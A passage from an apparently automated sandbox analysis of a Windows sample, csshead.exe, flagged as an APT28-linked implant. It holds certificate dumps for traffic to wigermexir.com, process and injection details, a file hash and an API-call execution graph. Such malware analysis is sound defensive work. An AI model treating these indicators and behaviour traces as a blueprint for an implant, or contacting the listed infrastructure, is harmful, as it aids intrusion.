A0 7E w..P.gvv.-......0010: A6 7E BA 4B ...K]]] Algorithm: [SHA256withRSA] Signature:0000: 1C B7 89 96 E4 53 ED BB EC DB A8 32 01 9F 2C A3 .....S.....2..,.0010: CD 6D AD 42 12 77 B3 B8 E6 C9 03 52 60 20 7B 57 .m.B.w.....R` .W0020: 27 C6 11 B5 3F 67 0D 99 2C 5B 5A CA 22 0A DD 9E '...?g..,[Z."...0030: BB 1F 4B 48 3F 8F 02 3D 8B 21 84 45 1D 6D F5 FF ..KH?..=.!.E.m..0040: AC 68 89 CD 64 E2 D6 D6 5E 40 C2 8E 2A F7 EF 14 .h..d...^@..*...0050: D3 36 A4 40 30 F5 32 15 15 92 76 FB 7E 9E 53 EA .6.@0.2...v...S.0060: C2 76 FC 39 AD 88 FE 66 92 26 E9 1C C4 38 CD 49 .v.9...f.&...8.I0070: FA 43 87 F0 5D D6 56 4D 81 D7 7F F1 C2 DD B0 4D .C..].VM.......M0080: FE C3 2A 6E 7C 9F 6E 5C ED 62 42 99 E1 F7 36 EE ..*n..n\.bB...6.0090: 14 8C 2C 20 E3 46 97 5A 77 03 C0 A0 C6 4A 88 FD .., .F.Zw....J..00A0: 40 22 87 72 5A 18 EA 9C A5 C7 5A 08 8C E4 05 A4 @".rZ.....Z.....00B0: 7D B9 84 35 5F 89 36 56 0E 40 3D 12 E8 BB 35 72 ...5_.6V.@=...5r00C0: ED AF 08 56 4E B0 BB 2E A9 9B E4 FB 1D 3E 0B 63 ...VN........>.c00D0: C8 9B 4B 91 44 66 57 C0 14 B4 96 F0 DC 2C 57 3F ..K.DfW......,W?00E0: 52 04 AD 95 AA 7D 4D D0 F2 0C 9F 9C 40 E8 D6 55 R.....M.....@..U00F0: 73 BA 3C DF 90 CB 00 5B 21 11 67 C2 ED 32 1E DE s.<....[!.g..2..]
Jul 4, 2018 14:05:41.652049065 CEST44349687212.92.98.68192.168.0.60CN=wigermexir.comCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USSun Jul 01 12:08:07 CEST 2018Sat Sep 29 12:08:07 CEST 2018[[ Version: V3 Subject: CN=wigermexir.com Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 27515031272528758016709389016982638278654075415619907878773545704892679022324021331274483099932631250670075425399772948315211979942672573149668630246265770359232246356766385241697526128954215430594140447096857757559961766760803102407934464897573737088779462244457668602532820539106584130816360781501560878758968069108963453140527927672534937763744659200866201341511232842080596965044692286093695184259152403289244069812249730671476938489895404318301340539228489881840614169616879350110155388825918586927630090993988927675750027511801636450524866604001567198011422615480817514013207399468294014432381409710208346826879 public exponent: 65537 Validity: [From: Sun Jul 01 12:08:07 CEST 2018, To: Sat Sep 29 12:08:07 CEST 2018] Issuer: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US SerialNumber: [ 03b9e2a5 6719a629 c63044a1 0526e7bb af41]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 81 F6 04 81 F3 00 F1 00 76 00 DB 74 AF EE CB .........v..t...0010: 29 EC B1 FE CA 3E 71 6D 2C E5 B9 AA BB 36 F7 84 )....>qm,....6..0020: 71 83 C7 5D 9D 4F 37 B6 1F BF 64 00 00 01 64 55 q..].O7...d...dU0030: 87 4A D0 00 00 04 03 00 47 30 45 02 20 20 E7 25 .J......G0E. .%0040: 7C 98 7E 88 92 5D DC A5 B6 C2 39 85 2A 11 CE 89 .....]....9.*...0050: 38 51 FC D6 44 4F 69 C9 ED C3 A3 C3 66 02 21 00 8Q..DOi.....f.!.0060: C0 85 55 A8 B0 FB B6 5F 9C D9 51 E4 5F 8D F1 7E ..U...._..Q._...0070: 68 52 53 67 1E AF 1E E8 EF DF 4D 8A 6F 4D DA 9B hRSg......M.oM..0080: 00 77 00 29 3C 51 96 54 C8 39 65 BA AA 50 FC 58 .w.)<Q.T.9e..P.X0090: 07 D4 B7 6F BF 58 7A 29 72 DC A4 C3 0C F4 E5 45 ...o.Xz)r......E00A0: 47 F4 78 00 00 01 64 55 87 4A DD 00 00 04 03 00 G.x...dU.J......00B0: 48 30 46 02 21 00 E2 5A 9F BF B1 87 C5 8C 9C F7 H0F.!..Z........00C0: 36 63 1B C9 99 7B FD C3 86 DB 03 80 0F 5A 6C D1 6c...........Zl.00D0: 18 AF 19 1A 13 12 02 21 00 E3 70 63 AA 86 D3 2A .......!..pc...*00E0: F8 04 FF 14 F3 1E 3D 2B 3C 85 1B 14 7D D3 79 92 ......=+<.....y.00F0: B0 D1 40 F3 F1 F3 B8 1C D2 ..@......[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.int-x3.letsencrypt.org, accessMethod: caIssuers accessLocation: URIName: http://cert.int-x3.letsencrypt.org/]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]][4]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1A 68 74 74 70 3A 2F 2F 63 70 73 2E 6C 65 74 ..http://cps.let0010: 73 65 6E 63 72 79 70 74 2E 6F 72 67 sencrypt.org], PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.2 qualifier: 0000: 30 81 9E 0C 81 9B 54 68 69 73 20 43 65 72 74 69 0.....This Certi0010: 66 69 63 61 74 65 20 6D 61 79 20 6F 6E 6C 79 20 ficate may only 0020: 62 65 20 72 65 6C 69 65 64 20 75 70 6F 6E 20 62 be relied upon b0030: 79 20 52 65 6C 79 69 6E 67 20 50 61 72 74 69 65 y Relying Partie0040: 73 20 61 6E 64 20 6F 6E 6C 79 20 69 6E 20 61 63 s and only in ac0050: 63 6F 72 64 61 6E 63 65 20 77 69 74 68 20 74 68 cordance with th0060: 65 20 43 65 72 74 69 66 69 63 61 74 65 20 50 6F e Certificate Po0070: 6C 69 63 79 20 66 6F 75 6E 64 20 61 74 20 68 74 licy found at ht0080: 74 70 73 3A 2F 2F 6C 65 74 73 65 6E 63 72 79 70 tps://letsencryp0090: 74 2E 6F 72 67 2F 72 65 70 6F 73 69 74 6F 72 79 t.org/repository00A0: 2F /]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.wigermexir.com DNSName: wigermexir.com][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 08 0C 7A 34 86 05 F1 53 40 36 EB B4 AB 7D 03 4A ..z4...S@6.....J0010: CC 4E 9C 69 .N.i]]] Algorithm: [SHA256withRSA] Signature:0000: 50 3F 76 28 69 5A ED F8 35 D7 CA 5C 31 9E F8 FD P?v(iZ..5..\1...0010: 1B 2A 57 06 1A A6 D2 A9 93 21 8C 55 9A 5E 3D 8D .*W......!.U.^=.0020: E5 35 20 1D 32 D1 B6 AB 60 B7 98 E8 10 82 41 D4 .5 .2...`.....A.0030: 39 5B 67 9F D8 B0 70 4F 25 0B CC 0C F4 C9 F9 5E 9[g...pO%......^0040: 7B 38 F8 3C 26 EF DE F2 1A 86 71 C3 FF DF 14 7E .8.<&.....q.....0050: EE 0A CC 78 AC 61 80 6B 01 6A F5 25 58 7B F8 1F ...x.a.k.j.%X...0060: 9B 1D 58 01 A3 16 6D B0 A4 44 70 15 98 4D 1F 5D ..X...m..Dp..M.]0070: 80 6C 02 9C 26 39 F5 5E 6A 0B 1A E5 CC EF 3B 60 .l..&9.^j.....;`0080: 71 D8 D6 11 5A 88 ED F0 F9 FA 3C 82 E4 CC AD A8 q...Z.....<.....0090: 77 DD 59 99 B8 63 B2 19 F7 8C 75 AF 26 AD B8 A8 w.Y..c....u.&...00A0: 84 95 CB 55 E8 69 A2 8B 04 9D 47 33 D3 4F 58 BD ...U.i....G3.OX.00B0: 85 66 14 9B 47 9E 41 4B C0 C8 D2 9F 7D A5 58 A2 .f..G.AK......X.00C0: 16 BC 44 30 81 88 5D 28 1F 36 6C 74 F6 EC 09 CC ..D0..](.6lt....00D0: 1A CF F7 DF B5 F0 B6 24 8B A7 C6 DF 13 AA 9C 0A .......$........00E0: 94 A4 91 60 61 46 B6 54 12 DF A6 4A 5C E8 B3 7E ...`aF.T...J\...00F0: 6C 5B A9 F6 AA 66 5A 73 F4 B5 D2 FC 0A 12 A9 4F l[...fZs.......O]
Jul 4, 2018 14:05:41.652049065 CEST44349687212.92.98.68192.168.0.60CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021[[ Version: V3 Subject: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19797248476075437682355852246492227182925025209894527646389863306257272162327717438476096960751529894413137923782807258828237626757946953550223743258656059351948211427799114263948499232121738590221774214131983890556391436336270214266656447169277800971416884432628642288505627878176138101439755752196484972290641499489076846352390454201028735981960275647482014359370041238010607728611828345534572152635280172155598035959878659370929022966413402097129857505568509453268467065766156311136296802046438183697980908977865999500405760226706893415483460747503705792669060406182022181441316967415301631965711690685520847684499 public exponent: 65537 Validity: [From: Thu Mar 17 17:40:46 CET 2016, To: Wed Mar 17 17:40:46 CET 2021] Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co. SerialNumber: [ 0a014142 00000153 85736a0b 85eca708]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://isrg.trustid.ocsp.identrust.com, accessMethod: caIssuers accessLocation: URIName: http://apps.identrust.com/roots/dstrootcax3.p7c]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C4 A7 B1 A4 7B 2C 71 FA DB E1 4B 90 75 FF C4 15 .....,q...K.u...0010: 60 85 89 10 `...]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.identrust.com/DSTROOTCAX3CRL.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 22 68 74 74 70 3A 2F 2F 63 70 73 2E 72 6F 6F ."http://cps.roo0010: 74 2D 78 31 2E 6C 65 74 73 65 6E 63 72 79 70 74 t-x1.letsencrypt0020: 2E 6F 72 67 .org]] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]]] Algorithm: [SHA256withRSA] Signature:0000: DD 33 D7 11 F3 63 58 38 DD 18 15 FB 09 55 BE 76 .3...cX8.....U.v0010: 56 B9 70 48 A5 69 47 27 7B C2 24 08 92 F1 5A 1F V.pH.iG'..$...Z.0020: 4A 12 29 37 24 74 51 1C 62 68 B8 CD 95 70 67 E5 J.)7$tQ.bh...pg.0030: F7 A4 BC 4E 28 51 CD 9B E8 AE 87 9D EA D8 BA 5A ...N(Q.........Z0040: A1 01 9A DC F0 DD 6A 1D 6A D8 3E 57 23 9E A6 1E ......j.j.>W#...0050: 04 62 9A FF D7 05 CA B7 1F 3F C0 0A 48 BC 94 B0 .b.......?..H...0060: B6 65 62 E0 C1 54 E5 A3 2A AD 20 C4 E9 E6 BB DC .eb..T..*. .....0070: C8 F6 B5 C3 32 A3 98 CC 77 A8 E6 79 65 07 2B CB ....2...w..ye.+.0080: 28 FE 3A 16 52 81 CE 52 0C 2E 5F 83 E8 D5 06 33 (.:.R..R.._....30090: FB 77 6C CE 40 EA 32 9E 1F 92 5C 41 C1 74 6C 5B .wl.@.2...\A.tl[00A0: 5D 0A 5F 33 CC 4D 9F AC 38 F0 2F 7B 2C 62 9D D9 ]._3.M..8./.,b..00B0: A3 91 6F 25 1B 2F 90 B1 19 46 3D F6 7E 1B A6 7A ..o%./...F=....z00C0: 87 B9 A3 7A 6D 18 FA 25 A5 91 87 15 E0 F2 16 2F ...zm..%......./00D0: 58 B0 06 2F 2C 68 26 C6 4B 98 CD DA 9F 0C F9 7F X../,h&.K.......00E0: 90 ED 43 4A 12 44 4E 6F 73 7A 28 EA A4 AA 6E 7B ..CJ.DNosz(...n.00F0: 4C 7D 87 DD E0 C9 02 44 A7 87 AF C3 34 5B B4 42 L......D....4[.B]

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: csshead.exe PID: 2092 Parent PID: 3692

General

Start time:13:59:40
Start date:04/07/2018
Path:C:\Users\user\Desktop\csshead.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\csshead.exe'
Imagebase:0x400000
File size:165888 bytes
MD5 hash:F0309AA0519EE70C29BBB471352781E7
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
  • Rule: IMPLANT_4_v10, Description: BlackEnergy / Voodoo Bear Implant by APT28, Source: 00000000.00000002.27490223943.00050000.00000004.sdmp, Author: US CERT
Reputation:low

Chronological Activities

Analysis Process: explorer.exe PID: 3160 Parent PID: 2092

General

Start time:14:00:21
Start date:04/07/2018
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe
Imagebase:0xe20000
File size:4064320 bytes
MD5 hash:FCBCED2A237DCD7EF86CED551B731742
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
  • Rule: IMPLANT_4_v10, Description: BlackEnergy / Voodoo Bear Implant by APT28, Source: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Author: US CERT
Reputation:moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: csshead.exe PID: 2092 Parent PID: 3692

    Execution Graph

    Execution Coverage:13.8%
    Dynamic/Decrypted Code Coverage:0.7%
    Signature Coverage:20.9%
    Total number of Nodes:1830
    Total number of Limit Nodes:52

    Graph

    execution_graph 18811 41c95b 18812 41c96d 18811->18812 18813 422a18 __getbuf 66 API calls 18812->18813 18814 41c990 __cftof2_l 18813->18814 18815 422a18 __getbuf 66 API calls 18814->18815 18817 41cab4 18815->18817 18816 41cae0 LoadLibraryA LoadIconA OleCreatePictureIndirect 18818 41cb2a LoadLibraryA LoadIconA OleCreatePictureIndirect 18816->18818 18817->18816 18820 41cbb6 18818->18820 18821 422a18 __getbuf 66 API calls 18820->18821 18822 41cc62 18821->18822 18823 41cd0f CreateEventA GetClassLongA SetClassLongA GetCursorPos 18822->18823 18824 41cd70 GetCursorPos 18823->18824 18825 41cdbf 18824->18825 18826 41cfaf WaitForSingleObject 18825->18826 18828 41cfc9 __cftof2_l 18825->18828 18826->18824 18826->18828 18827 41d090 WaitNamedPipeA 18827->18828 18829 41d0a3 CreateFileA 18827->18829 18828->18827 18828->18829 18830 41d0c9 SetNamedPipeHandleState 18828->18830 18829->18828 18829->18830 18831 41d0e6 18830->18831 18832 41d0e3 CloseHandle 18830->18832 18833 41d0f2 WriteFile 18831->18833 18837 41d13e LookupAccountNameA GetLastError 18831->18837 18832->18831 18834 41d107 CloseHandle 18833->18834 18835 41d10a ReadFile 18833->18835 18834->18835 18835->18831 18836 41d122 CloseHandle 18835->18836 18836->18831 18838 41d190 GetLastError 18837->18838 18839 41d17b GetLastError 18837->18839 18840 41d19b LocalAlloc 18838->18840 18856 41d188 18838->18856 18934 4242f0 18839->18934 18842 41d1b0 GetLastError 18840->18842 18843 41d1c0 LocalAlloc 18840->18843 18844 4242f0 104 API calls 18842->18844 18846 41d1cf GetLastError 18843->18846 18847 41d1df LookupAccountNameA 18843->18847 18848 41d1bd 18844->18848 18850 4242f0 104 API calls 18846->18850 18849 41d201 GetLastError 18847->18849 18854 41d20e 18847->18854 18848->18843 18852 4242f0 104 API calls 18849->18852 18853 41d1dc 18850->18853 18851 41d215 LocalFree 18851->18856 18852->18854 18853->18847 18854->18851 18854->18856 18855 41d2f4 SetStretchBltMode 18855->18856 18856->18855 18857 41d30d SetAbortProc DrawFrameControl 18856->18857 18893 410910 18856->18893 18861 41d35e LoadImageA 18857->18861 18859 41d439 18901 417e60 18859->18901 18860 41d3c8 18860->18859 18862 41d3d6 SetWindowLongA 18860->18862 18861->18859 18861->18860 18862->18860 18864 41d444 18865 41d516 CreateEventA GetCursorPos 18864->18865 18868 41d590 18865->18868 18866 41d5b0 GetCursorPos 18867 41d5d0 DragQueryFile 18866->18867 18867->18868 18868->18866 18868->18867 18869 41d70f EnableMenuItem 18868->18869 18871 41d694 CreateRectRgnIndirect 18868->18871 18873 41d6e3 WaitForSingleObject 18868->18873 18870 41d971 __cftof2_l 18869->18870 18887 41d75f GetDlgItem OleInitialize 18869->18887 18872 41d987 SetMenuItemInfoA 18870->18872 18871->18868 18871->18869 18874 41d9bc GetLastError 18872->18874 18875 41d9c4 DrawMenuBar 18872->18875 18873->18868 18876 41d9cb __cftof2_l 18874->18876 18875->18876 18877 41d9da GetMenuItemInfoA BeginPaint EndPaint GetClientRect EnumDateFormatsA 18876->18877 18882 41da5b 18877->18882 18878 41da80 lstrcmpi 18879 41da8c lstrcmpi 18878->18879 18884 41dac9 18878->18884 18880 41da98 lstrcmpi 18879->18880 18879->18884 18881 41daa4 lstrcmpi 18880->18881 18883 41dac7 18880->18883 18881->18882 18881->18883 18882->18878 18882->18883 18886 41db3e Sleep 18883->18886 18951 4198e0 RtlEnterCriticalSection GetCurrentThreadId 18883->18951 18886->18884 18890 41d93c RegisterDragDrop GetTopWindow RevokeDragDrop 18887->18890 18891 41d95a OleUninitialize 18890->18891 18891->18870 18974 423911 18893->18974 18896 41092b 18896->18856 18900 41097e 18902 423911 77 API calls 18901->18902 18904 417e74 18902->18904 18903 417e7b 18903->18864 18904->18903 18905 423189 FindHandler 66 API calls 18904->18905 18906 417eb7 18905->18906 18907 423991 FindHandler RaiseException 18906->18907 18908 417ece 18907->18908 18909 417edf 18908->18909 18910 417f5c OleInitialize GetWindowTextLengthA 18908->18910 18911 417f39 GetWindowLongA 18909->18911 18916 417ee6 18909->18916 18912 417f7a ___crtLCMapStringA 18910->18912 18913 417f90 18910->18913 18917 417f51 OleUninitialize 18911->18917 18918 417f49 18911->18918 18921 417fb3 GetWindowTextA SetWindowTextA 18912->18921 18933 4180a8 18912->18933 18914 422a18 __getbuf 66 API calls 18913->18914 18914->18912 18915 418166 NtdllDefWindowProc_A 18915->18864 18916->18915 18919 417f07 GetWindowLongA 18916->18919 18917->18915 18918->18917 18919->18915 18920 417f1d GetWindowLongA SetWindowLongA 18919->18920 18920->18915 18922 417fd7 18921->18922 18923 417fe7 GlobalAlloc 18922->18923 18924 41802a lstrlen 18922->18924 18925 418025 18923->18925 18926 417ff6 GlobalFix 18923->18926 18930 418047 ___crtLCMapStringA 18924->18930 18925->18924 18927 41800e GlobalUnWire 18926->18927 18927->18925 19020 410680 18930->19020 18931 418132 SetWindowLongA 18932 418147 18931->18932 18932->18915 18933->18864 18935 4242fc FindHandler 18934->18935 18936 42430a 18935->18936 18937 42431f _write_string 18935->18937 18938 4251b8 __cftof2_l 66 API calls 18936->18938 19036 42b146 18937->19036 18939 42430f 18938->18939 18941 425166 __cftof2_l 11 API calls 18939->18941 18944 42431a FindHandler 18941->18944 18942 424331 _write_string 19041 42b1e3 18942->19041 18944->18856 18945 424343 _write_string 19048 42b349 18945->19048 18947 42435b _write_string 19069 42b27f 18947->19069 19386 414170 18951->19386 18954 419951 18955 419967 18954->18955 18956 4199d2 InterlockedIncrement ShowWindow 18954->18956 19391 410190 IsWindow 18955->19391 18958 4199f9 18956->18958 18959 410190 6 API calls 18958->18959 18967 419a11 18959->18967 18968 419a37 18967->18968 19397 421e7e 18967->19397 18970 422804 std::exception::_Tidy 66 API calls 18968->18970 18972 419a45 18968->18972 18970->18972 18971 422804 std::exception::_Tidy 66 API calls 18973 419a62 18971->18973 18972->18971 18972->18973 18973->18886 18976 42391b 18974->18976 18975 422a18 __getbuf 66 API calls 18975->18976 18976->18975 18977 410924 18976->18977 18978 427a95 __getbuf RtlDecodePointer 18976->18978 18981 423937 std::exception::exception 18976->18981 18977->18896 18986 423189 18977->18986 18978->18976 18983 4249b3 76 API calls 18981->18983 18985 423975 18981->18985 18982 423991 FindHandler RaiseException 18984 423990 18982->18984 18983->18985 18992 423217 18985->18992 18987 42312b FindHandler 66 API calls 18986->18987 18988 410967 18987->18988 18989 423991 18988->18989 18990 4239c6 RaiseException 18989->18990 18991 4239ba 18989->18991 18990->18900 18991->18990 18995 4231b0 18992->18995 18996 4231c0 18995->18996 18999 4231d5 18995->18999 19001 42316b 18996->19001 18999->18982 19002 42317e 19001->19002 19003 423176 19001->19003 19002->18999 19005 42312b 19002->19005 19004 422804 std::exception::_Tidy 66 API calls 19003->19004 19004->19002 19006 423139 _strlen 19005->19006 19009 42315e 19005->19009 19007 422a18 __getbuf 66 API calls 19006->19007 19008 42314b 19007->19008 19008->19009 19011 422aac 19008->19011 19009->18999 19012 422aba 19011->19012 19014 422ac1 19011->19014 19012->19014 19016 422adf 19012->19016 19013 4251b8 __cftof2_l 66 API calls 19015 422ac6 19013->19015 19014->19013 19017 425166 __cftof2_l 11 API calls 19015->19017 19018 422ad0 19016->19018 19019 4251b8 __cftof2_l 66 API calls 19016->19019 19017->19018 19018->19009 19019->19015 19029 418480 RtlEnterCriticalSection RegisterClipboardFormatA RegisterClipboardFormatA GetClassInfoExA 19020->19029 19022 41068b 19023 423911 77 API calls 19022->19023 19025 4106a4 19023->19025 19024 410757 19024->18931 19024->18933 19025->19024 19026 410777 SysAllocString 19025->19026 19027 410719 SysFreeString 19025->19027 19026->19024 19026->19027 19027->19024 19030 4184de LoadCursorA RegisterClassExA 19029->19030 19031 418547 __cftof2_l 19029->19031 19030->19031 19032 4185e7 19030->19032 19034 418562 GetClassInfoExA 19031->19034 19033 4185ff RtlLeaveCriticalSection 19032->19033 19033->19022 19034->19033 19035 418582 LoadCursorA RegisterClassExA 19034->19035 19035->19032 19037 42b153 19036->19037 19038 42b169 RtlEnterCriticalSection 19036->19038 19039 42c08b ___crtLCMapStringA 66 API calls 19037->19039 19038->18942 19040 42b15c 19039->19040 19040->18942 19077 42dc91 19041->19077 19043 42b1f2 19084 42dc3b 19043->19084 19045 42b1f8 _write_string 19046 42b245 19045->19046 19047 42a0df __getbuf 66 API calls 19045->19047 19046->18945 19047->19046 19093 42224b 19048->19093 19051 4251b8 __cftof2_l 66 API calls 19052 42b3b5 19051->19052 19053 42b3c3 19052->19053 19066 42b3f1 _strlen __aulldvrm 19052->19066 19054 4251b8 __cftof2_l 66 API calls 19053->19054 19055 42b3c8 19054->19055 19057 425166 __cftof2_l 11 API calls 19055->19057 19056 42b3d3 19058 429814 __87except 5 API calls 19056->19058 19057->19056 19059 42beee 19058->19059 19059->18947 19060 42b2b3 99 API calls _write_string 19060->19066 19061 42ba0e RtlDecodePointer 19061->19066 19062 422804 std::exception::_Tidy 66 API calls 19062->19066 19063 42b2e2 99 API calls _write_string 19063->19066 19064 42ff3f 78 API calls __Stoull 19064->19066 19066->19056 19066->19060 19066->19061 19066->19062 19066->19063 19066->19064 19067 42ba7b RtlDecodePointer 19066->19067 19068 42ba9d RtlDecodePointer 19066->19068 19101 42de3f 19066->19101 19067->19066 19068->19066 19070 42b28a 19069->19070 19072 42436c 19069->19072 19070->19072 19238 42fc25 19070->19238 19073 424384 19072->19073 19074 424389 _write_string 19073->19074 19380 42b1b4 19074->19380 19076 424394 19076->18944 19078 42dcb2 19077->19078 19079 42dc9d 19077->19079 19078->19043 19080 4251b8 __cftof2_l 66 API calls 19079->19080 19081 42dca2 19080->19081 19082 425166 __cftof2_l 11 API calls 19081->19082 19083 42dcad 19082->19083 19083->19043 19085 42dc48 19084->19085 19087 42dc57 19084->19087 19086 4251b8 __cftof2_l 66 API calls 19085->19086 19091 42dc4d 19086->19091 19088 42dc75 19087->19088 19089 4251b8 __cftof2_l 66 API calls 19087->19089 19088->19045 19090 42dc68 19089->19090 19092 425166 __cftof2_l 11 API calls 19090->19092 19091->19045 19092->19091 19094 42225e 19093->19094 19096 4222ab 19093->19096 19104 425eeb 19094->19104 19096->19051 19098 42228b 19098->19096 19124 425504 19098->19124 19102 42224b ___crtLCMapStringA 76 API calls 19101->19102 19103 42de52 19102->19103 19103->19066 19105 425e72 __getptd 66 API calls 19104->19105 19106 425ef3 19105->19106 19107 422263 19106->19107 19108 424664 __amsg_exit 66 API calls 19106->19108 19107->19098 19109 425c85 19107->19109 19108->19107 19110 425c91 FindHandler 19109->19110 19111 425eeb __getptd 66 API calls 19110->19111 19112 425c96 19111->19112 19113 425cc4 19112->19113 19115 425ca8 19112->19115 19114 42c08b ___crtLCMapStringA 66 API calls 19113->19114 19116 425ccb 19114->19116 19117 425eeb __getptd 66 API calls 19115->19117 19140 425c38 19116->19140 19119 425cad 19117->19119 19122 425cbb FindHandler 19119->19122 19123 424664 __amsg_exit 66 API calls 19119->19123 19122->19098 19123->19122 19125 425510 FindHandler 19124->19125 19126 425eeb __getptd 66 API calls 19125->19126 19127 425515 19126->19127 19128 42c08b ___crtLCMapStringA 66 API calls 19127->19128 19132 425527 19127->19132 19130 425545 19128->19130 19129 42558e 19234 42559f 19129->19234 19130->19129 19133 425576 InterlockedIncrement 19130->19133 19134 42555c InterlockedDecrement 19130->19134 19131 425535 FindHandler 19131->19096 19132->19131 19136 424664 __amsg_exit 66 API calls 19132->19136 19133->19129 19134->19133 19137 425567 19134->19137 19136->19131 19137->19133 19138 422804 std::exception::_Tidy 66 API calls 19137->19138 19139 425575 19138->19139 19139->19133 19141 425c45 19140->19141 19142 425c7a 19140->19142 19141->19142 19143 4259c5 __getptd 8 API calls 19141->19143 19148 425cf2 19142->19148 19144 425c5b 19143->19144 19144->19142 19151 425a54 19144->19151 19233 42bfb2 RtlLeaveCriticalSection 19148->19233 19150 425cf9 19150->19119 19152 425ae8 19151->19152 19153 425a65 InterlockedDecrement 19151->19153 19152->19142 19165 425aed 19152->19165 19154 425a7a InterlockedDecrement 19153->19154 19155 425a7d 19153->19155 19154->19155 19156 425a87 InterlockedDecrement 19155->19156 19157 425a8a 19155->19157 19156->19157 19158 425a97 19157->19158 19159 425a94 InterlockedDecrement 19157->19159 19160 425aa1 InterlockedDecrement 19158->19160 19161 425aa4 19158->19161 19159->19158 19160->19161 19162 425abd InterlockedDecrement 19161->19162 19163 425ad8 InterlockedDecrement 19161->19163 19164 425acd InterlockedDecrement 19161->19164 19162->19161 19163->19152 19164->19161 19166 425b04 19165->19166 19167 425b71 19165->19167 19166->19167 19170 425b38 19166->19170 19176 422804 std::exception::_Tidy 66 API calls 19166->19176 19168 425bbe 19167->19168 19169 422804 std::exception::_Tidy 66 API calls 19167->19169 19177 422804 std::exception::_Tidy 66 API calls 19168->19177 19184 425be7 19168->19184 19171 425b92 19169->19171 19173 425b59 19170->19173 19181 422804 std::exception::_Tidy 66 API calls 19170->19181 19172 422804 std::exception::_Tidy 66 API calls 19171->19172 19175 425ba5 19172->19175 19174 422804 std::exception::_Tidy 66 API calls 19173->19174 19179 425b66 19174->19179 19180 422804 std::exception::_Tidy 66 API calls 19175->19180 19182 425b2d 19176->19182 19177->19184 19178 425c2c 19183 422804 std::exception::_Tidy 66 API calls 19178->19183 19186 422804 std::exception::_Tidy 66 API calls 19179->19186 19188 425bb3 19180->19188 19187 425b4e 19181->19187 19193 42e30d 19182->19193 19189 425c32 19183->19189 19184->19178 19185 422804 66 API calls std::exception::_Tidy 19184->19185 19185->19184 19186->19167 19221 42e2a4 19187->19221 19192 422804 std::exception::_Tidy 66 API calls 19188->19192 19189->19142 19192->19168 19194 42e407 19193->19194 19195 42e31e 19193->19195 19194->19170 19197 42e32f 19195->19197 19198 422804 std::exception::_Tidy 66 API calls 19195->19198 19196 42e341 19201 42e353 19196->19201 19202 422804 std::exception::_Tidy 66 API calls 19196->19202 19197->19196 19199 422804 std::exception::_Tidy 66 API calls 19197->19199 19198->19197 19199->19196 19200 42e365 19205 42e377 19200->19205 19206 422804 std::exception::_Tidy 66 API calls 19200->19206 19201->19200 19203 422804 std::exception::_Tidy 66 API calls 19201->19203 19202->19201 19203->19200 19204 42e389 19208 422804 std::exception::_Tidy 66 API calls 19204->19208 19210 42e39b 19204->19210 19205->19204 19207 422804 std::exception::_Tidy 66 API calls 19205->19207 19206->19205 19207->19204 19208->19210 19209 422804 std::exception::_Tidy 66 API calls 19214 